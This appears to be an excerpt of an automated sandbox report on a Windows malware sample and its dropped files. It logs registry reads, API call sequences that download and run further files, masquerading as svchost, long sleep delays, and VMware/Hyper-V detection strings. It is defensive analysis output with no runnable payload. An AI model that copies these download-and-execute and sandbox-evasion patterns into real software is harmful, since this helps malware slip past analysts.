Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003401	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003001	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001001	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001801	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002001	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00004001	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000401	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002801	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001C01	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003801	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002401	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000423	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000402	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C04	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001404	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000804	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001004	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000404	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000405	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000406	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000465	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000813	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000413	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C09	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002809	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001009	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002409	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001809	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002009	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001409	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003409	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001C09	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002C09	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000809	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000409	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003009	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000425	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000429	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040B	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000080C	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C0C	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040C	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000140C	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000180C	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000100C	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C07	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000407	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001407	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001007	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000807	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000408	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040D	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000439	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040E	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000421	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000410	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000810	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000411	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000044B	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000043F	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000412	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000440	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000426	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000427	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000083E	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000043E	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000450	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000414	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000415	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000416	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000816	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000418	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000419	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C1A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000081A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041B	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000424	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002C0A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000400A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000340A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000240A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000140A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001C0A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000300A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000440A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000100A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000480A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000080A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00004C0A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000180A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003C0A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000280A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000500A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C0A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000380A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000200A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000441	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000081D	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041D	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000045A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041E	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041F	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000422	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000042A	Jump to behavior

Source: C:\Windows\Temp\ .exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem WHERE Name="user-PC"

Source: C:\Windows\Temp\server.exe	Last function: Thread delayed
Source: C:\Windows\Temp\server.exe	Last function: Thread delayed
Source: C:\Windows\Temp\v5.exe	Last function: Thread delayed
Source: C:\Windows\Temp\v5.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\033726\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\033726\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405302
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_0040263E FindFirstFileA,	0_2_0040263E
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_00405CD8 FindFirstFileA,FindClose,	0_2_00405CD8
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,	3_2_10001A20
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,	3_2_100014B0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,	3_2_10008B50
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,	3_2_10008520
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008E40 FindFirstFileA,FindClose,FindClose,	3_2_10008E40
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	3_2_100086F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle,	3_2_10008F00
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0045B051 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,	5_2_0045B051
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00405260 FindFirstFileA,GetFileAttributesA,SetFileAttributesA,RemoveDirectoryA,DeleteFileA,FindNextFileA,FindClose,	5_2_00405260
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00439D40 #17,__time32,FindFirstFileA,DeleteFileA,	5_2_00439D40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,	8_2_10001A20
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,	8_2_10008B50
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,	8_2_100014B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,	8_2_10008520
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008E40 FindFirstFileA,FindClose,FindClose,	8_2_10008E40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	8_2_100086F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle,	8_2_10008F00

Source: C:\Windows\Temp\server.exe

3_2_1000AA30

Source: C:\Windows\Temp\v5.exe

Code function: 2_2_00406090 6D0C6DE0,LoadLibraryA,6D0C6DE0,LoadLibraryA,6D0C6DE0,GetSystemDefaultUILanguage,memset,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,sprintf,_mbscpy,lstrcpy,RegQueryValueExA,GetSystemInfo,memset,sprintf,_mbscpy,_mbscpy,GlobalMemoryStatusEx,__aulldiv,__aulldiv,wsprintfA,malloc,GetAdaptersInfo,free,malloc,GetAdaptersInfo,strcmp,GetIfTable,??2@YAPAXI@Z,GetIfTable,sprintf,_mbscpy,sprintf,_mbscpy,??3@YAXPAX@Z,free,GetTickCount,

2_2_00406090

Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\033726\svchost.exe	Thread delayed: delay time: 60000
Source: C:\Windows\SysWOW64\033726\svchost.exe	Thread delayed: delay time: 1200000
Source: C:\Windows\SysWOW64\033726\svchost.exe	Thread delayed: delay time: 180000

Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user	Jump to behavior

Source: server.exe, 00000003.00000002.2683900710.000000000067D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
Source: server.exe, 00000003.00000002.2683900710.00000000006B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: server.exe, 00000003.00000002.2683900710.00000000006F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lSTORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: .exe.0.dr	Binary or memory string: 00-50-56 VMWare, Inc.
Source: v5.exe, 00000002.00000002.1330252488.0000000000794000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\-
Source: server.exe, 00000003.00000002.2683900710.00000000006F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}}
Source: .exe.0.dr	Binary or memory string: 00-1C-14 VMware, Inc
Source: .exe.0.dr	Binary or memory string: 00-0C-29 VMware, Inc.
Source: svchost.exe, 00000008.00000002.2659797363.0000000000885000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[
